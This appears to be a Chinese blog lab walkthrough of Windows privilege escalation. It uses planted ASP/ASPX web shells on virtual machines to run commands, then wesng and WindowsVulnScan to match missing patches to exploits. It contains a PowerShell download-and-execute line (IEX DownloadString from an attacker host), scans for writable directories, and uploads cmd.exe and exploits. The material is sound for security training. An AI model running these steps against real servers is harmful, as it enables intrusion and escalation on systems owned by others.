当前位置: 首页 > news >正文

Windows提权之基本流程(二)

首先我们

安装环境

首先 在百度网盘上下载好是这样的

通过网盘分享的文件:08serverR2-1.zip

链接: 百度网盘 请输入提取码 提取码: 7hyh

--来自百度网盘超级会员v3的分享

我们在虚拟机里边打开

点击打开虚拟机

然后选中.vmx结尾的 双击打开

然后点击获取所有权

点击继续运行 虚拟机

点击 我已经复制虚拟机

点击放弃

点击确定

然后点击开启虚拟机

摁下回车 快速启动

摁下这个按钮

点击 administrator 输入密码 123456

点击确定

然后我们打开 这个目录下的

我们这里有 sb.asp 还有sb.aspx 这个是我们的后门

下边是

提权的流程

能够执行cmd命令->是否打补丁->补丁对应exp->获取服务器权限 执行命令的时候 aspx->php和asp

如果管理员删除服务器组件 wscript.shell无法在asp执行cmd命令 这个时候可以使用aspx的后门查看是否有权限执行cmd命令

如果是校园网的同学们

我们记得把桥接模式修改为nat模式 因为校园网不能进行桥接

然后我们输入

ipconfig 来查询ip 192.168.25.139

然后我们再我们的本机上输入

192.168.25.139

然后我们访问 .asp文件

http://192.168.25.139/sb.asp

输入密码 123456

我们进入

是这个鬼样子 因为这个网页在我们现在的这个浏览器版本里边 已经好多不兼容了

所以我们在 这个目标主机 里边自带的低版本的浏览器里进行访问

还是一样的

http://192.168.25.139/sb.asp

输入密码 123456

我们进入 在这个浏览器里边已经很正常了

我们点击

发现存在

wscript.shell 命令行执行组件,显示

我们就可以执行cmd命令了

点击

然后我们再点击执行

我么执行

whoami

我们也可以查看详细信息

whoami /all

如果我们不能执行cmd的话

我们可以上传到别处的cmd.exe问文件

然后修改对应的路径即可

然后我们来看看sb.aspx文件

输入

http://192.168.25.139/sb.aspx

然后密码是 admin

我们进入

我们点击

然后再点击

我们还是可以执行cmd的

我们执行 whoami /all

我们发现都i是iss的权限 这个权限是最低的

所以我们就要进行提权

然后我们打开在线补丁验证平台

潮影在线免杀平台

我们输入systeminfo

我们复制到输入框里

我们点击获取exp

还有我们发现了

第一个网站这里 命令行 没有/c

第二个网站这里 命令这里有/c

那麽这是镇魔意思呢

就是 我们查看源代码 发现第一个网站这里 后台源码 已经帮助你加上了/c

而第二个网站这里后台没有帮你加上/c 所以显示在了 前台

也就是说 我们输入指令 前边都加上了 /c

那摩 /c 是啥意思呢 为啥要加这个呢

我们可以看下边这几篇文章

https://jingyan.baidu.com/article/cd4c2979266c30756e6e6091.html

cmd /c和cmd /k-CSDN博客

我这里也给你们解释一下

/c 就是 执行字符串指定的命令然后终止

我们输入 cmd systeminfo

然后我们输入

cmd /c systeminfo

然后等待中

首先我们先把systeminfo 的信息文件都导入一个文件里

我们输入

systeminfo > C:\ProgramData\1.txt

然后我们在我们自己本机上的浏览器输入
http://192.168.25.139/sb.aspx#

点击下载

选择 保存

下载到我们本机上

然后我们下载我们的

查询补丁工具wesng

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation

下载好之后我们解压缩

然后我们把1.txt文件放入

然后我们输入cmd

首先这个要是python3版本的

其次我们要查询语法

我们要先更新

我们要输入

python wes.py --update-wes

其次我们

然后我们要查询exp

python wes.py 1.txt

在最后我们发现 有207有可能能利用的exp

然后我们来看下一款工具

WindowsVulnScan 查询补丁

下载地址

GitHub - chroblert/WindowsVulnScan

windows-exp-suggester

这款和本工具的原理一样,尝试使用了之后,发现它的CVEKB数据库只更新到2017年的,并且没有给出

CVE是否有公开的EXP信息。

工具的原理是

1. 搜集CVE与KB的对应关系。首先在微软官网上收集CVE与KB对应的关系,然后存储进数据库中

2. 查找特定CVE网上是否有公开的EXP

3. 利用powershell脚本收集主机的一些系统版本与KB信息

4. 利用系统版本与KB信息搜寻主机上具有存在公开EXP的CVE

参数说明

# author: JC0o0l
# GitHub: https://github.com/chroblert/
可选参数:
-h, --help show this help message and exit
-u, --update-cve 更新CVEKB数据
-U, --update-exp 更新CVEEXP数据
-m MODE, --mode MODE 搭配-U使用。更新模式 All:更新所有;Empty:只更新空白的;Error:只更
新之前未成功更新的
-C, --check-EXP 检索具有EXP的CVE
-n PRODUCTNAME, --productName PRODUCTNAME
搭配-C使用。自定义产品名称,如Windows 10
-N PRODUCTVERSION, --productVersion PRODUCTVERSION
搭配-C使用。自定义产品版本,如20H2
-f FILE, --file FILE ps1脚本运行后产生的.json文件


 

首先我们先下载下来

解压缩

我们进入目录

有两个版本

我们进入下一个 因为下一个是最新的

然后我们现在对他进行修改

我们修改上传目录

C:\ProgramData\

然后保存

然后我们打开我们的kail机

我们把这个修改过的文件 复制到kail机的桌面上

然后我们在桌面开启80d端口服务

然后新建窗口

查询ifconfig 192.168.25.138

Powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.25.138/KBCollect.ps1')

然后我们在本机执行cmd

然后我们点击生成

然后我们找到 KB.json文件

我们点击编辑他

发现里边不是我们想要的内容(这里我为什莫我知道不是我们想要的内容呢 是因为 我做过 所以我知道 嘿嘿)

然后我们修改后缀

继续在执行cmd

这下我们加了些引号

"Powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.25.138/KBCollect.ps1')"

看看行不行

然后我们继续点击该文件 发现还是不行

所以我们现在 换一台主机

还是老样子 我们在百度网盘上下载好 还是同样的步骤 我们下载解压缩 然后用虚拟机打开(这里跟打开上一个主机的步骤是一样的 这里我便不再多说)

通过网盘分享的文件:12server7.zip.002等2个文件

链接: 百度网盘 请输入提取码 提取码: dyh8

--来自百度网盘超级会员v3的分享

我们打开虚拟机

首先打开cmd窗口 我们来查询ip

ipconfig

192.168.25.140

同理 我在我们本机上输入 然后输入密码admin

http://192.168.25.140/sb.aspx

首先我们查看

C:\Windows\Temp\

我们把后缀修改为.json1

然后我们打开cmdshell

然后其他环境不变 kail上打开了80端口服务

我们继续输入

"Powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.25.138/KBCollect.ps1')"

然后就会出现这个

然后这里的报错不用管

然后这里就有我们写入的

然后我们打开编辑 然后这个就是我们正确的样子

然后我们点击下载 到我们的本机上

然后我们把该文件 替换到该目录下

我们顺势打开cmd

我们输入

python cve-check.py -C -f KB.json

然后我们等待exp 生成

然后我们就可以利用了

然后

查询可写目录或者文件

在确定可以执行cmd命令时,有些服务器会对目录进行权限设置,导致iis_user用户组没有权限对常见的目录进行写入和读取,这时可以用扫描可写目录脚本对目录进行遍历扫描,得到可写目录 上传或下载 提权exp 或替换文件 进行利用。

常见的脚本有wt.asp 红色表示文件可替换 蓝色表示目录可写

我们打开我们刚才下载的虚拟机

里边就有这两个文件

我们在我们的本机上输入

http://192.168.25.140/wt.aspx

然后我们等待片刻 这里我只列举了一部分分

然后我们在浏览上输入另外一个文件

http://192.168.25.140/wt.asp

然后我们点击开始检测

然后我们等待中

代表的意思是 文件可以进行改写 目录我们可以进行写入

然后我们可以都试试

c:\windows\debug\WIA\

这个目录里边的cmd.exe 是我们之前上传的 我们现在进行删除

我们上传一个新的cmd.exe 上传桌面上的这个

上传成功 我们重新进入 cmd shell

修改cmd的路径

c:\windows\debug\WIA\cmd.exe

我们点击执行命令

发现是可以执行的

这个是进入

http://192.168.25.139/sb.asp

接下来然后我们进入另一个文件

http://192.168.25.139/sb.aspx

同样我们也修改cmd 的路径

这是修改之前的

这是修改之后的

发现我们还是可以执行的

同时 我们不仅可以上传cmd文件 我们还可以上传一些exp 来获得更高的权限

相关文章:

  • SIM盾构建安全底座的障碍
  • 穿越AI边界:深度集成DeepSeek API与云平台的实践之路
  • seacmsv9报错注入
  • Pytorch使用手册-使用Wav2Vec2进行强制对齐(专题二十五)
  • 排查和解决线程池瓶颈问题案例
  • 【Veristand】Veristand 预编写教程目录
  • 3-提前结束训练
  • 大模型应用: 多模态交互
  • C++ 106. 从中序与后序遍历序列构造二叉树 - 力扣(LeetCode)
  • mac os 使用 root 登录
  • ubuntu22.04系统如何自建2级ntp服务器
  • Uniapp 小程序:语音播放与暂停功能的实现及优化方案
  • 相同的树-
  • 15.5 基于 RetrievalQA 的销售话术增强系统实战:构建智能销售大脑
  • RAG项目实战:金融问答系统
  • 数据存储:使用Python存储数据到redis详解
  • js 获取节点相对于屏幕的坐标位置,获取节点的宽高,获取鼠标事件回调的鼠标位置,计算鼠标相对于某个节点下的坐标
  • 【量化科普】Leverage,杠杆
  • Java中的锁机制:synchronized vs ReentrantLock,如何选择?
  • Python 函数式编程-装饰器
  • 特朗普促卡塔尔说服伊朗放弃核计划,伊朗总统:你来吓唬我们?
  • 鄂州交警通报致1死2伤车祸:女子操作不当引发,已被刑拘
  • 微软宣布将裁员3%
  • 四部门:到2025年底,全国行政村5G通达率超过90%
  • 2025上海科技节本周六启幕,机器人和科学家同走AI科学红毯
  • 时隔近4年再出征!长三丙成功发射通信技术试验卫星十九号